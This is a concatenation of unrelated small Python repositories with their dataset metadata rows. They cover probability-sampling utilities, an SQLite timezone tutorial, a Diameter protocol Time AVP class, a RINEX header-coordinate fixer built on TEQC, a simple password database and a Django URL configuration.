        distribution = normalize(distribution)
    draws = sorted(random.random() for _ in range(n))
    samples = []
    samplePos, distPos, cdf = 0, 0, distribution[0]
    while samplePos < n:
        if draws[samplePos] < cdf:
            # This draw falls inside the current bucket.
            samplePos += 1
            samples.append(values[distPos])
        else:
            # Advance to the next bucket of the CDF.
            distPos += 1
            cdf += distribution[distPos]
    return samples
def sample(distribution, values=None):
    """Draw a single value from a discrete distribution.

    Accepts either a Counter (keys become the values) or a parallel pair of
    (distribution, values) sequences.  The distribution is normalized when
    it does not already sum to 1.
    """
    if type(distribution) == Counter:
        pairs = list(distribution.items())
        distribution = [v for k, v in pairs]
        values = [k for k, v in pairs]
    if sum(distribution) != 1:
        distribution = normalize(distribution)
    choice = random.random()
    # Walk the cumulative distribution until it exceeds the draw.
    i = 0
    total = distribution[0]
    while choice > total:
        i += 1
        total += distribution[i]
    return values[i]
def sampleFromCounter(ctr):
    """Draw a single key from Counter 'ctr', weighted by its counts."""
    pairs = list(ctr.items())
    weights = [v for k, v in pairs]
    keys = [k for k, v in pairs]
    return sample(weights, keys)
def getProbability(value, distribution, values):
    """Gives the probability of a value under a discrete distribution
    defined by (distributions, values).  Duplicate entries of the value
    have their probabilities summed.
    """
    matches = (prob for prob, val in zip(distribution, values) if val == value)
    return sum(matches, 0.0)
def flipCoin(p):
    """Return True with probability p (a single biased coin flip)."""
    return random.random() < p
def chooseFromDistribution(distribution):
    """Sample from either a Counter/dict or a list of (prob, key) pairs."""
    if type(distribution) == dict or type(distribution) == Counter:
        return sample(distribution)
    draw = random.random()
    cumulative = 0.0
    for prob, element in distribution:
        cumulative += prob
        if draw <= cumulative:
            return element
def nearestPoint(pos):
    """Round a continuous (row, col) position to the nearest grid point."""
    row, col = pos
    return (int(row + 0.5), int(col + 0.5))
def sign(x):
    """Return 1 for non-negative x, -1 otherwise."""
    return 1 if x >= 0 else -1
def arrayInvert(array):
    """Transpose a matrix stored as a list of lists.

    The result always has len(array) rows (one per input row), so for a
    matrix with fewer columns than rows the trailing rows come back empty.
    """
    transposed = [[] for _ in array]
    for row in array:
        for col_index, cell in enumerate(row):
            transposed[col_index].append(cell)
    return transposed
def matrixAsList(matrix, value=True):
    """Return the (row, col) coordinates whose matrix entry equals 'value'.

    The column count is taken from the first row, so the matrix is assumed
    rectangular and non-empty.
    """
    rows, cols = len(matrix), len(matrix[0])
    return [(row, col)
            for row in range(rows)
            for col in range(cols)
            if matrix[row][col] == value]
def lookup(name, namespace):
    """Get a method or class from any imported module from its name.
    Usage: lookup(functionName, globals())
    """
    dots = name.count('.')
    if dots > 0:
        # Dotted name: import the module part and fetch the final attribute.
        moduleName, objName = '.'.join(name.split('.')[:-1]), name.split('.')[-1]
        module = __import__(moduleName)
        return getattr(module, objName)
    else:
        # Bare name: search every imported module in the namespace, plus the
        # namespace itself, requiring exactly one match.
        modules = [obj for obj in namespace.values() if str(type(obj)) == "<type 'module'>"]
        options = [getattr(module, name) for module in modules if name in dir(module)]
        options += [obj[1] for obj in namespace.items() if obj[0] == name ]
        if len(options) == 1: return options[0]
        # NOTE(review): the '%s' below is never filled in, and this raise
        # syntax is Python 2 only.
        if len(options) > 1: raise Exception, 'Name conflict for %s'
        raise Exception, '%s not found as a method or class' % name
def pause():
    """Pauses the output stream awaiting user feedback.
    """
    print "<Press enter/return to continue>"
    raw_input()  # Python 2 builtin; blocks until the user presses enter
## code to handle timeouts
import signal
class TimeoutFunctionException(Exception):
    """Exception to raise on a timeout"""
    pass
class TimeoutFunction:
    # Callable wrapper that aborts `function` with TimeoutFunctionException
    # after `timeout` seconds, using SIGALRM where the platform provides it.
    def __init__(self, function, timeout):
        "timeout must be at least 1 second. WHY??"
        # (signal.alarm only accepts whole seconds, hence the 1s floor.)
        self.timeout = timeout
        self.function = function

    def handle_timeout(self, signum, frame):
        # Signal-handler signature (signum, frame); always raises.
        raise TimeoutFunctionException()

    def __call__(self, *args):
        if not 'SIGALRM' in dir(signal):
            # Platform without SIGALRM (e.g. Windows): run with no timeout.
            return self.function(*args)
        old = signal.signal(signal.SIGALRM, self.handle_timeout)
        signal.alarm(self.timeout)
        try:
            result = self.function(*args)
        finally:
            # Restore the previous handler and cancel any pending alarm.
            signal.signal(signal.SIGALRM, old)
            signal.alarm(0)
        return result
| [
"noreply@github.com"
] | noreply@github.com |
a21a2341e1464df20cbe61e5ff72e72e222b92cc | 6c119f4bd4042672624e39d7fab80d922199f57a | /checkdb.py | fd98610741ef2ec08bac3311ed5adcc70d6eadef | [] | no_license | mkioga/39_python_RollingBack | 29ca1e17c13328611750f7a0fb6b0d4ee0575c72 | 27f0cfa913e35b2bfc34ad9ef54d364e39d06466 | refs/heads/master | 2020-03-27T19:59:51.008116 | 2018-09-01T20:11:08 | 2018-09-01T20:11:08 | 147,029,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,105 | py |
# ===========
# checkdb.py
# ===========
# We will try to get some input from the "history" table in "accounts" database
import sqlite3
db = sqlite3.connect("accounts.sqlite")
for row in db.execute("SELECT * FROM history"):
print(row)
db.close()
# When we run above code, we get this results. This is a tuple consisting of two strings (time, name) and an int (deposits)
# ('2018-07-04 14:14:31.203132+00:00', 'John', 1010)
# ('2018-07-04 14:14:31.353149+00:00', 'John', 10)
# ('2018-07-04 14:14:31.509387+00:00', 'John', 10)
# ==========================================================================
# We can confirm that the timestamp is in string format by using this code
# Demo 2: show that, by default, the timestamp column is returned as a plain str.
import sqlite3
db = sqlite3.connect("accounts.sqlite")
for row in db.execute("SELECT * FROM history"):
    local_time = row[0]  # first column is the timestamp
    print("Time = {}: Format = {}".format(local_time, type(local_time)))
db.close()
# When we run the above code, we get this result, showing that the timestamp is in string format
# Time = 2018-07-04 14:14:31.203132+00:00: Format = <class 'str'>
# Time = 2018-07-04 14:14:31.353149+00:00: Format = <class 'str'>
# Time = 2018-07-04 14:14:31.509387+00:00: Format = <class 'str'>
# NOTE that we can convert these string types into DATETIME values by importing the DATETIME module
# and using the strptime method of the DATETIME module.
# you can find this in documentation if you want to use it.
# There is a gotcha on this which we will mention later, but as long as we use python documentation
# and Not the SQLITE datetime documentation, we will be fine
# ====================================================================
#
# We have used the python sqlite3 timestamp column type for out times and this relies on the fact that
# the sqlite3 library can examine custom datatypes per column and respond to types that it knows about
# it is possible to define and register your own data types but the "date" and "timestamp" type have already been registered for us.
# So we just need to tell sqlite3 to respond to them.
# we do that by passing PARSE_DECLTYPES when we create the connection
# Demo 3: PARSE_DECLTYPES asks sqlite3 to run the registered converters for
# declared column types (date/timestamp), returning Python objects, not strings.
import sqlite3
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"):
    local_time = row[0]
    print("Time = {}: Format = {}".format(local_time, type(local_time)))
db.close()
# When you run above code, the PARSE_DECLTYPES is supposed to convert the string into "datetime" but in my case
# am still getting class string
# Time = 2018-07-04 14:14:31.203132+00:00: Format = <class 'str'>
# Time = 2018-07-04 14:14:31.353149+00:00: Format = <class 'str'>
# Time = 2018-07-04 14:14:31.509387+00:00: Format = <class 'str'>
# For more information on Adapters and converters, check this link on section 12.6.2.2.2
# https://docs.python.org/3/library/sqlite3.html
# https://docs.python.org/3/library/sqlite3.html#using-adapters-to-store-additional-python-types-in-sqlite-databases
# ===========================================================
# This PARSE_DECLTYPES does not handle timezone aware dates
# you can see results above look like ==> Time = 2018-07-04 14:14:31.203132+00:00:
# The end has +00.00 which shows not timezone variation (either plus or minus)
# we can confirm this by modifying "rollback5.py" to include timezone and then we will see this code will not show timezone
# Now to go "rollback5.py"
# Demo 4: same query rerun after rollback5.py was changed to store naive
# (timezone-free) datetimes; now the converter yields datetime.datetime.
import sqlite3
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"):
    local_time = row[0]
    print("Time = {}: Format = {}".format(local_time, type(local_time)))
db.close()
# After making the timezone changes in rollback5.py, we come and run this and get this result
# We are getting the format "datetime" and we also have no timezone as expected.
# Time = 2018-07-04 10:00:49.391110: Format = <class 'datetime.datetime'>
# Time = 2018-07-04 10:00:49.481968: Format = <class 'datetime.datetime'>
# Time = 2018-07-04 10:00:49.570322: Format = <class 'datetime.datetime'>
# ================================================
# How to retrieve timezones
# ================================================
# There is no reliable standard python libraries to parse with datetime values
# However there are additional libraries to help you retrieve timezones.
# we can search for "python dateutil latest version" and get this link
# https://pypi.org/project/python-dateutil/
# ===============================================
# METHOD_1: To display localtime
# ===============================================
# Note that we first go back to rollback6.py and make changes to _current_time so it does not use "astimezone"
# METHOD 1: convert the stored UTC datetimes to local time on the Python side
# using pytz (stored values are naive UTC, so we localize then convert).
import sqlite3
import pytz
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"):
    utc_time = row[0] # Retrieves UTC time
    local_time = pytz.utc.localize(utc_time).astimezone() # Converts UTC time to localtime
    print("UTC Time = {}: Local Time = {}".format(utc_time, local_time)) # Display both UTC time and Local time
db.close()
# When we run this code, we now get UTC time and Local time in this format
# its now 3.23 PM UTC time (15:23) and 10.23 AM Central time (my local time)
# UTC Time = 2018-07-04 15:23:32.362647: Local Time = 2018-07-04 10:23:32.362647-05:00
# UTC Time = 2018-07-04 15:23:32.451843: Local Time = 2018-07-04 10:23:32.451843-05:00
# UTC Time = 2018-07-04 15:23:32.529392: Local Time = 2018-07-04 10:23:32.529392-05:00
# ===================================================================
# METHOD_2: To display localtime using "sqlite3 strftime function":
# ===================================================================
# We will look at an alternative way to show time in UTC timezone.
# The other way of doing this is to use "sqlite datetime functions" and perform a conversion before getting data from server
# NOTE we don't need to import pytz
# NOTE: if you get a message that "sqlite dialect is not configured" when you hover over the select statement, you can correct this by:
# File > Settings > Search for sql > Select SQL dialect > choose checkdb.py and select sqlite next to it.
# In my version of intellij, I don't see this problem and there is no SQL dialect. So we ignore it.
# Here the SELECT query uses the strftime function to convert the time field into a string.
# "%Y-%m-%d %H:%M:%f" is the parameter that gives the format that datetime will be produced. year, month, day, hour, minute, fractional second (SS:SSS)
# SQLite datetime functions are documented here
# https://www.sqlite.org/lang_datefunc.html
# "history.time" provides a time value from the time column of the history table.
# "localtime" is the modifier to cause the UTC time to be converted to local time
# NOTE that instead of using "strftime" we can use "datetime", but make sure to refer to above link to get correct parameters for datetime function
# METHOD 2: let SQLite itself do the conversion with strftime(..., 'localtime');
# any client querying the database then sees local times with no Python-side work.
import sqlite3
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT strftime('%Y-%m-%d %H:%M:%f', history.time, 'localtime') AS localtime,"
                      "history.account, history.amount FROM history ORDER BY history.time"):
    print(row)
db.close()
# When we run above code, we get results as follows.
# you can see the dates are now in local time
# ADVANTAGE of this method is that it will work with whatever client is being used to access the database.
# So we could create a view in that select statement and users will be able to view data in their local time
# ('2018-07-04 10:23:32.362', 'John', 1010)
# ('2018-07-04 10:23:32.451', 'John', 10)
# ('2018-07-04 10:23:32.529', 'John', 10)
# ('2018-07-04 10:23:32.630', 'John', -30
# ===============================================
# Creating a VIEW for this query
# ==============================================
# We will create a view in rollback6.py by copying code below and adding it to rollback6.py
# db.execute("SELECT strftime('%Y-%m-%d %H:%M:%f', history.time, 'localtime') AS localtime,"
# "history.account, history.amount FROM history ORDER BY history.time"):
# After modifying rollback6.py and running it to create a view, we can query the view here using this code.
# import sqlite3
#
# db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
#
# for row in db.execute("SELECT * FROM localhistory"):
# print(row)
#
# db.close()
# When we run this code, we get these results which are similar to the ones we got from previous code.
# It is showing results in local time
# ('2018-07-05 15:08:15.802', 'John', 1010)
# ('2018-07-05 15:08:15.937', 'John', 10)
# ('2018-07-05 15:08:16.101', 'John', 10)
# ('2018-07-05 15:08:16.233', 'John', -30)
# =====================================================
# Checkdb to run solution 3 of Challenge
# ======================================================
# Challenge solution 3: the original timezone object was pickled into the 4th
# column; unpickle it and convert the stored UTC time back into that zone.
import sqlite3
import pytz
import pickle
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"): # we select from history table
    utc_time = row[0]
    pickled_zone = row[3]
    zone = pickle.loads(pickled_zone) # unpickle the stored tzinfo object with pickle's "loads" function
    local_time = pytz.utc.localize(utc_time).astimezone(zone) # astimezone converts UTC to its original timezone
    print("UTC_TIME = {}, LOCAL_TIME = {}, LOCAL_TIME_TZINFO = {}".format(utc_time, local_time, local_time.tzinfo))
db.close()
# When we run this, we get this results
# UTC_TIME = 2018-07-06 13:42:51.050407, LOCAL_TIME = 2018-07-06 08:42:51.050407-05:00, LOCAL_TIME_TZINFO = Central Daylight Time
# UTC_TIME = 2018-07-06 13:42:51.181332, LOCAL_TIME = 2018-07-06 08:42:51.181332-05:00, LOCAL_TIME_TZINFO = Central Daylight Time
# UTC_TIME = 2018-07-06 13:42:51.482452, LOCAL_TIME = 2018-07-06 08:42:51.482452-05:00, LOCAL_TIME_TZINFO = Central Daylight Time
# UTC_TIME = 2018-07-06 13:42:51.637715, LOCAL_TIME = 2018-07-06 08:42:51.637715-05:00, LOCAL_TIME_TZINFO = Central Daylight Time
| [
"mkioga@yahoo.com"
] | mkioga@yahoo.com |
32e6cd3643c1465c51b964a2220dbfde464d0360 | 7c3704db33fbf00d657457f2e380523b1e414ffa | /0.1/src/PyDccLib/avp_time.py | 647470e4c0fa759588c26d1b81a8ffc9f73be095 | [] | no_license | ganmao/Ocs-Test-Suite | 93099e3ecf0a8823734684bb3bc81a9b32175061 | 2e30ae29edb5725bafa075a5654b6d953275804b | refs/heads/master | 2020-06-04T17:07:19.207637 | 2010-12-10T03:06:20 | 2010-12-10T03:06:20 | 578,791 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,867 | py | #!/usr/bin/evn python
#-*- coding:utf-8 -*-
'''
Created on 2010-10-1
@author: zdl
'''
from avp_octetstring import OctetString
class Time(OctetString):
'''
时间格式是从OctetString AVP基本格式导出的。该字符串必须包含4个八位组,
与NTP时间戳格式的前4个字节格式相同。NTP时间戳在NTP协议规范[RFC2030]
第3章中定义。本格式描述的时间,从通用协调时间(UTC)1900年1月1日0点
开始。在UTC时间2036年二月7日6点28分16秒,时间值将溢出。SNTP规范中描述
了将时间扩展到2104年的程序,所有DIAMETER节点都必须支持该程序。
'''
def __init__(self, avp_code=0, avp_data=None, vendor_id=0,
mandatory=0, private=0, level=0, decode_buf=None,
cmd_etc_instance=None):
OctetString.__init__(self, avp_code, avp_data, vendor_id,
mandatory, private, level, decode_buf,
cmd_etc_instance)
self.avp['AVP_DATA_TYPE'] = "Time"
self.avp['AVP_TIME_STAMP'] = None
self.avp['AVP_TIME_STR'] = None
# 编码时根据传入的日期格式转化为NTP时间戳
if self.avp['AVP_CODE_STATE'] == "00":
self.avp['AVP_TIME_STR'] = self.avp['AVP_DATA']
self.avp['AVP_DATA'] = self.Time2NTPStamp(self.avp['AVP_DATA'])
self.avp['AVP_TIME_STAMP'] = self.avp['AVP_DATA']
data_length = len(self.avp['AVP_DATA'])
data_length = (data_length + 3) // 4 * 4
self.avp['AVP_CODE_OPERATOR'] = "!" + str(data_length) + "s"
# 可读格式输出模板
self.print_template = self.make_template("\
${L}AVP_CODE = [${AVP_CODE}] - ${AVP_NAME} - ${AVP_DATA_TYPE}(\"${AVP_CODE_OPERATOR}\") \n\
${L}AVP_FLAG = [${AVP_FLAG}] (VENDOR_ID(${AVP_VENDOR_ID})|MANDATORY(${AVP_MANDATORY})|PRIVATE(${AVP_PRIVATE}) \n\
${L}AVP_LENGTH = [${AVP_LENGTH}] \n\
${L}AVP_VENDOR_ID = [${AVP_VENDOR_ID}] \n\
${L}AVP_TIME_STAMP = [${AVP_TIME_STAMP}]\n\
${L}AVP_TIME_STR = [${AVP_TIME_STR}]\n\
${L}~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
self.print_detail_template = self.make_template("\
${L}${AVP_CODE_HEX}\n${L}\tAVP_CODE = [${AVP_CODE}] - ${AVP_NAME} - ${AVP_DATA_TYPE}(\"${AVP_CODE_OPERATOR}\") \n\
${L}${AVP_FLAGS_HEX}\n${L}\tAVP_FLAG = [${AVP_FLAG}] (VENDOR_ID(${AVP_VENDOR_ID})|MANDATORY(${AVP_MANDATORY})|PRIVATE(${AVP_PRIVATE}) \n\
${L}${AVP_LENGTH_HEX}\n${L}\tAVP_LENGTH = [${AVP_LENGTH}] \n\
${L}${AVP_VONDER_HEX}\n${L}\tAVP_VENDOR_ID = [${AVP_VENDOR_ID}] \n\
${L}${AVP_DATA_HEX}\n\
${L}\tAVP_TIME_STAMP = [${AVP_TIME_STAMP}]\n\
${L}\tAVP_TIME_STR = [${AVP_TIME_STR}]\n\
${L}~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
self.simple_print_template = self.make_template("${L}${AVP_NAME}(${AVP_CODE}) = [${AVP_DATA}]")
def decode_data(self, offset=8):
'''解码AVP包体数据
返回本次解码AVP包的总长度
'''
self._reset_operator_type()
(self.avp['AVP_DATA'],) = self.unpack_from_bin(self.avp['AVP_CODE_OPERATOR'],
self.avp['AVP_BUF'],
offset)
self.avp['AVP_DATA_HEX'] = self.avp['AVP_BUF'][offset:]
self.avp['AVP_TIME_STAMP'] = float(self.avp['AVP_DATA'])
# Time类型需要将时间戳转为可读格式
self.avp['AVP_DATA'] = self.NTPStamp2Time(self.avp['AVP_TIME_STAMP'])
self.avp['AVP_TIME_STR'] = self.avp['AVP_DATA']
return self.avp['AVP_LENGTH']
| [
"zdl0812@163.com"
] | zdl0812@163.com |
93c1d8871bbceebf7b99803b4d0dd754695de719 | 7051493bec7aa84ee3ec937243d1987193d98b7e | /jphouse/tools/SaveImg.py | 0ec029068ea28749adb5f4ecba75d6895c01e65a | [] | no_license | iqhighest/jphouse | 66927425ef50e53398a678334964743090758802 | 033b3095115efe26f2ba449434d6c021f66534a8 | refs/heads/master | 2021-01-20T10:18:25.062374 | 2017-05-05T07:20:03 | 2017-05-05T07:20:03 | 90,342,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | # -*- coding: UTF-8 -*-
import os, urllib, uuid
# 生成一个文件名字符串
def generateFileName():
return str(uuid.uuid1())
# 根据文件名创建文件
def createFileWithFileName(localPath, fileName):
if not os.path.exists(localPath):
os.makedirs(localPath)
totalPath = localPath + '\\' + fileName
if not os.path.exists(totalPath):
file = open(totalPath, 'a+')
file.close()
return totalPath
# 根据图片的地址,下载图片并保存在本地
def getAndSaveImg(imgUrl, localPath):
if (len(imgUrl) != 0):
fileName = generateFileName() + '.jpeg'
urllib.request.urlretrieve(imgUrl, createFileWithFileName(localPath, fileName))
| [
"steven.zhang@sunupper.com"
] | steven.zhang@sunupper.com |
3860977d2d8cb813df4d0cf26ed29f9e52f423e6 | ab0d188eea448e7a6b045d86ced1ba8b33697ff3 | /rinexXYZStandardization.py | 5df704bd2741bcff9ce315cc93a5d0381dbb49f0 | [] | no_license | zzhmy/RINEX | 1a2b2dad4c24a432602428816abfb701de87dcd0 | 84e0f5dede2e7b3a45cfbe3cb464c7d25d216b79 | refs/heads/master | 2020-12-24T12:29:26.490286 | 2017-02-06T04:59:46 | 2017-02-06T04:59:46 | 72,994,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,633 | py | # -*- coding:utf-8 -*-
"""
这里用#-*- coding: utf-8 -*-
否则pycharm输出对汉字不支持,会出现乱码
"""
# python 2.7
# by zzh_my@163.com
"""
功能:把RINEX文件头中的XYZ坐标信息进行标准化。
采用TEQC生成的S文件进行RINEX头坐标信息的替换。
"""
import os
import shutil
import glob
import sys
# whether have teqc
print "coding by zzh_my@163.com"
print "2016-01-30\n"
documentSegment=os.path.sep ##用于返回当前平台的目录分隔符,Windows是反斜杠(\),Linux是斜杠(/)
mydir = os.getcwd() # check current directory
print "这是您当前的目录: " + mydir
# inquiry whether change directory
mydirAnswer = raw_input("你是否想改变这个目录?? n/y: ") # beloew python 3.0,function is raw_input;above python 3.0,function is input.would you want to change directory
print mydirAnswer
mydirAnswer = mydirAnswer.lower() # all change to lower-case
if mydirAnswer == 'y':
mydir = raw_input("请输入您的全目录: ") # please input your full direcorty
print "您输入的目录是: " + mydir # you input directory is
elif mydirAnswer == 'n':
print "您输入的目录是 : " + mydir
# change directory is end
os.chdir(mydir) # change directory
print "这是您的工作目录: " + os.getcwd()
# inqure whether quit,if input "y",quit
quit_inqure = raw_input("您打算退出程序吗? n/y: ")
if quit_inqure.lower() == 'y':
print "您将会退出程序"
raw_input("press <enter>") # waiting your end this
raise SystemExit
#判断是否存在TEQC
winDir = os.getenv("windir") # get windows os directory
# programHomeDir=os.getcwd() #获取脚本运行目录
programHomeDir = os.path.split(os.path.realpath(sys.argv[0]))[0] # 获取脚本所在目录
teqcDir = winDir + "\\teqc.exe" # 欲安装功能程序的目录
programHomeTeqcDir = programHomeDir + '\\teqc.exe' # 随程序包发布的功能程序
if (not (os.path.exists(teqcDir)) ):
if (os.path.exists(programHomeTeqcDir) ):
print "复制teqc和runpkr00到windows目录下。"
# (programHomeTeqcDir,teqcDdir)
shutil.copyfile(programHomeTeqcDir, teqcDir)
else:
print "不存在teqc,程序将马上退出"
raw_input("press <enter>") # waiting your end this
raise SystemExit # 出现错误
for fileName in glob.glob(r"D:\temp\teqcS\*.16o"): #win10:\
shortFileName = os.path.basename(fileName)
filePathDIR=os.path.dirname(fileName)
#生成S文件
strdos =' teqc +qc '+fileName
print "Teqc is dealing--->" + shortFileName
os.popen(strdos)
#提取S文件XYZ坐标
teqcSfile =filePathDIR + documentSegment + shortFileName[0:len(shortFileName) - 1] + 'S'
fTeqcS = open(teqcSfile, "r")
findTextXYZ = ''
flag = 1
while (flag):
text_to_line = fTeqcS.readline()
flag = flag + 1
if 'antenna WGS 84 (xyz)' in text_to_line:
flag = 0
findTextXYZ = text_to_line # find xyz line
elif flag > 100:
print '在'+teqcSfile+'文件中未找到坐标,请核对'
raise SystemExit # 出现错误
# 关闭打开的文件
fTeqcS.close()
findTextXYZ = findTextXYZ[25:66]
#利用提取的XYZ生成新的临时O文件
FileNameTEMP=filePathDIR + documentSegment +shortFileName+'.tmp'
strdos='teqc -O.px '+findTextXYZ+' ' +fileName +' > '+FileNameTEMP
os.popen(strdos)
#删除原O文件,把临时文件改名
os.remove(fileName)
os.remove(teqcSfile)
os.rename(FileNameTEMP, fileName)
print "程序运行完毕!!"
a = raw_input('按任意键结束程序!') | [
"zzh_my@163.com"
] | zzh_my@163.com |
3c12a3af2f5d134b08f1be7061c5934536e9618a | abd1a1d532b196f72b580f5f45aa0f4f90692416 | /env/bin/symilar | 976367e92deafa0639edc0b775ee3278179dbb25 | [] | no_license | woodi22/RetroPie-DB | c030f1462e44aa1ce422ba2f5dda611845c72f68 | 06b4915c0c63535a55b2860f55064fe81ad21aa1 | refs/heads/main | 2023-01-22T12:10:13.357387 | 2020-12-04T16:26:19 | 2020-12-04T16:26:19 | 317,090,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | #!/Users/isaacwood/Desktop/WebProgrammingFinalProject/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_symilar
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run_symilar())
| [
"woodi@moravian.edu"
] | woodi@moravian.edu | |
c4680034e9a9212b2d405cb3a2535216d6714528 | e94e72d81b6d526884ac76af96e1053c0c86d039 | /getpw/db.old.py | ce00699dffe54a0765cbc59e578622f2b35d90b4 | [] | no_license | fengcms/python-learn-demo | b7ba81fb5e9375d70bacd520373e5e204c8f6bc1 | f1509781ee001d5e48a8d24adc298e3e6b083d12 | refs/heads/master | 2023-03-19T02:35:51.919681 | 2022-11-23T09:37:07 | 2022-11-23T09:37:07 | 114,220,375 | 11 | 7 | null | 2023-03-13T21:50:56 | 2017-12-14T07:59:39 | Python | UTF-8 | Python | false | false | 2,376 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
##########################################################################
# Name: db.py #
# Author: FungLeo #
# Date: 2017-12-20 #
# Purpose: This program is used to generate simple or complex passwords #
# Copy: for study, prohibition of commercial use #
##########################################################################
import sqlite3
import re
import sys
from prettytable import PrettyTable
from pwlang import lang
DB_PATH = sys.path[0] + '/passwd.db'
def checkDB(db):
    """Ensure the ``passwd`` table exists, creating it if necessary.

    :param db: an open sqlite3 cursor (or connection) to run the DDL on.

    Uses ``CREATE TABLE IF NOT EXISTS``, which is atomic and replaces the
    original fragile approach of regex-matching the stringified output of a
    query against ``sqlite_master``.
    """
    db.execute('''CREATE TABLE IF NOT EXISTS passwd (
        id integer primary key autoincrement,
        name varchar(255),
        password varchar(255),
        time timestamp default current_timestamp
    )''')
def insertDb(name, passwd):
    """Insert one (name, password) record into the passwd table.

    :param name: label for the stored password.
    :param passwd: the password string itself.

    Uses a parameterized query: the original concatenated user input straight
    into the SQL string, so a name containing a quote broke the statement and
    allowed SQL injection.
    """
    conn = sqlite3.connect(DB_PATH)
    c = conn.cursor()
    checkDB(c)
    c.execute("INSERT INTO passwd (name, password) VALUES (?, ?)", (name, passwd))
    conn.commit()
    conn.close()
def selectDb(pid, name):
    """Print matching passwd rows as an ASCII table.

    :param pid: if truthy, select only the row with this exact id
                (takes precedence over ``name``).
    :param name: if truthy, substring-match against the name column.

    Filters are bound as query parameters; the original interpolated raw user
    input into the SQL (injection risk) and, when both ``pid`` and ``name``
    were given, emitted two ``where`` clauses and produced invalid SQL.
    """
    conn = sqlite3.connect(DB_PATH)
    c = conn.cursor()
    checkDB(c)
    query = "SELECT * from passwd"
    params = ()
    if pid:
        query += " where id = ?"
        params = (pid,)
    elif name:
        query += " where name LIKE ?"
        params = ('%' + name + '%',)
    query += " ORDER BY id DESC"
    res = list(c.execute(query, params))
    if len(res) == 0:
        print(lang('db_no_emp'))
    else:
        x = PrettyTable(['id', 'name', 'password', 'time'])
        x.align['name'] = 'l'
        x.padding_width = 1
        for row in res:
            x.add_row(list(row))
        print(x)
    conn.close()
conn.close()
def deleteDb(pid):
    """Delete the passwd row with the given id and report the outcome.

    :param pid: primary-key id of the record to delete.

    The id is bound as a query parameter instead of being concatenated into
    the SQL string as in the original (injection-prone).
    """
    conn = sqlite3.connect(DB_PATH)
    c = conn.cursor()
    checkDB(c)
    c.execute('DELETE from passwd where id = ?', (pid,))
    conn.commit()
    o = conn.total_changes
    if o == 0:
        print(lang('db_del_fail'))
    if o == 1:
        print(lang('db_del_succ_left') + str(pid) + lang('db_del_succ_right'))
    conn.close()
| [
"web@fengcms.com"
] | web@fengcms.com |
380bc8c1da49f475ada2cd52d147697aadacfd3c | b0e38ce58d77e4f4e5072f64c88697803d5f0806 | /60.0 Fonksiyon sinifi.py | 0e745aae46b5e179206eab2c253d0190f13a0f84 | [] | no_license | fport/feyzli-python | eade1c856cb2eee2e26b3a517fd8ea44f3fbfc05 | e8b60d9ae7fb5c3e84be2c348a3a2df5b606f018 | refs/heads/master | 2022-11-23T07:18:17.695382 | 2020-07-22T11:40:01 | 2020-07-22T11:40:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 750 | py | def islem(islemAdi):
def toplama(*sayilar):
toplam = 0
for i in sayilar:
toplam += i
return toplam
def carpma(*sayilar):
carpim = 1
for i in sayilar:
carpim*=i
return carpim
def faktoriyelAl(faktoriyelsayi):
faktoriyel = 1
for i in range(1,faktoriyelsayi+1):
faktoriyel*=i
return faktoriyel
if islemAdi == "+":
return toplama
elif islemAdi == "*":
return carpma
else:
return faktoriyelAl
toplam = islem("+")
print(type(toplam))
print(toplam(1,2,3,4,5))
carpim = islem("*")
print(carpim(1,2,3,4,5))
fak = islem("!")
print(fak(6))
| [
"noreply@github.com"
] | noreply@github.com |
444a8b82d9035b67e5b874852d5ab470cd9f7eb7 | abab124bc7ffe34ff95e282a59c4005456a53ee3 | /mysite/urls.py | 9baac2e6c6265f10ccdff8021d63a552242a28d7 | [] | no_license | guyunhua/mysite | b35245aef059f7566838d2524a053a95a1270280 | f3a38fd7ed8ced038d7fa4562eb6704c5281b084 | refs/heads/master | 2023-05-15T09:51:59.765938 | 2021-06-09T11:53:26 | 2021-06-09T11:53:26 | 375,300,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 920 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from chunyu import views
# URL routing table: admin site plus the three chunyu app views.
urlpatterns = [
    path('admin/', admin.site.urls),
    # site root -> chunyu.views.index
    path("", views.index, name="index"),
    path("generic", views.generic, name="generic"),
    path("elements", views.elements, name='elements')
]
| [
"97099101@qq.com"
] | 97099101@qq.com |
